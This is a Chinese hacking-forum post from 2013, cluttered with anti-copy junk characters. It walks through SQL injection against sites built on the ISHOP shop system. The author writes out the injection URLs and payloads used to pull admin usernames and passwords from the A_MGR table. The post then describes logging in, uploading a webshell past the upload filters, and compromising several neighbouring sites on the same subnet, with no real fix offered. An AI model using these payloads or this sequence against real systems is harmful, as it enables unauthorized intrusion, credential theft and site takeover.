找回密码
 立即注册
查看: 2957|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点. {- j. @- r5 d$ N# H7 F1 H; E
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
4 v* z/ ?7 x( `9 A% z
! ]2 e+ x  R6 A9 O/ F, w习惯性的加’having1=1--
, X  V( g" N: [1 k4 x3 |  E" r: C/ }, U) `+ j5 u5 ~& i
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—/ l9 K' @% K+ N  w1 ]9 m; A

2 i9 |( A; K$ j, s( ~; T0
% I3 N0 L# d  Q! U, E4 u/ V% v6 E6 t! J1 g
爆出Diary_A.dl_Title(这时候很激动啊)6 W1 G. v: I5 q: c1 T; Y
( x2 x+ Z" V; g
那么继续
( S3 u- `' a0 z% ?0 ~http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—1 q. d+ q( `; D+ q  G% ^
: u3 N' H* Y, y9 c' L
继续,一直爆下去
* ~: k/ ~$ B4 x. h: w
2 G; \8 q5 `6 g; ?爆到几个字段和表段 但是没找到需要的管理用户的字段
; Z" `0 w+ B) k3 }  F* k2 f- ?4 M, L0 q$ w$ z5 L
蛋疼了 怎么办 然后去后台登陆页看源码
9 T7 K9 d; X. y  `5 V0 i0 P6 v: A- t& ~; p0 h4 C0 D) B
08 O+ X$ _) q6 p9 ~$ n4 Z

9 }) s6 ]* R" GInput name= “ADUID”
/ C4 H& \/ K9 v) B( lInput name= “ADPWD”, A: x# z) {/ V0 H2 p
+ M" D6 i  b0 S9 O- p3 r2 x1 M
很幸运 找到了字段那就继续9 X* \9 u, v3 w" {0 h
找到之后开始爆用户8 {  L2 r# Q2 {6 `7 i# h/ c3 \
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
/ q6 Q6 n; @1 A+ g( c爆密码
+ z. h! w" V6 N4 ~  A- q0 Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—% e  |7 c' D+ Q5 h
测试了下 这个注入点只能爆到文章哪里的表
4 I6 V. \; ~2 j, U' u0 V" q0 X) \5 H0 P, C8 q
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了2 _/ p& Z7 o: W* r0 c; _

5 W9 b! v2 @/ y  L又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了) u3 |, E6 Q# P$ X' K) V6 s
" S. T' R, b. o" d4 v
473
1 u) g7 N/ e" x& ~& p
' N& A& J9 Q/ N; ^* C! F进后台) b4 ^' D( `' a( [' s6 ]5 j

0 z  l& P2 D1 C+ y2 C4 u. I0 L
9 _4 Y9 t( B* X) H5 U: S) D; j3 V发现几个上传点 有的地方不能上传 而且防止恶意代码$ z# S2 {2 H4 q" x0 {3 g
: A8 C4 L2 u4 F5 f( V, W$ d
没办法 各种百度各种找大牛 找到一只好像可以突破的马
) c' O% m9 [  M7 t$ X7 O% x# Z! G) P' ]

3 d( T+ r9 i2 K" E3 C3 o在系统管理那里直接上传 不过没有显示地址3 k3 N% V7 c$ g
  C3 [, N" T9 X& _, h1 q# o
再上传一次 抓包 搞定OK$ K7 U, l5 p- I
7 Z( j( j9 C: a8 D
' K2 q6 p  p" W- C+ r- }
1 e: U$ d0 F3 z+ {4 F! r
472
2 S, w! ^" I3 ?. Y8 Y  s
* H( F" J( R0 `9 y$ z; z4 e3 y晚上不行了 去睡觉。。。! [: i0 E1 r( u- F3 s4 U
第二天刚起床 闲的没事做继续日站吧 ; v- T, O9 j  J

% t  [  ~- S2 a8 ?0 Q找个站 就把这个站的旁c扫了下
0 F0 R6 u% g$ F* I
/ Q! c. A, w5 [: `+ N3 O& B% `发现c段也有一个购物站 ,然后还和这个站的模板差不多
7 r: G8 z! E$ E
/ b' S# X4 C- d# G就找到会员登录口测试8 W' k" Z5 h4 [. {
! s; Q* _$ n# ?1 f. K6 H6 S: u
'and (select top 1 MGR_UID from A_MGR)>0—+ g0 d$ r1 Q7 B
果断爆到了 这时候我很激动 通杀8 j1 n) h& ]1 `4 z

% K- [) Z, _+ Q% I. r1 T再次翻c段( n% p& O$ h  I$ G6 q; p( y
& D3 P! q1 g5 U( B/ S3 T: Z
翻出几个站 都成功拿下
* U9 d  g" k9 t; @
" |/ k6 I8 |& L8 V, m. w
& ?1 Z1 r# b; q3 }0 r) x8 s6 B" c- m! Y/ F
修复方案:
; p/ P; N3 [6 z4 G0 g% l他们比我专业 " V8 T$ ~3 U/ Y& p/ S" p' l: ?

6 y/ v, b8 a; ~" o& ^
4 `+ t& C$ w! {' w. K1 d; X3 J4 |9 ?* J* |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表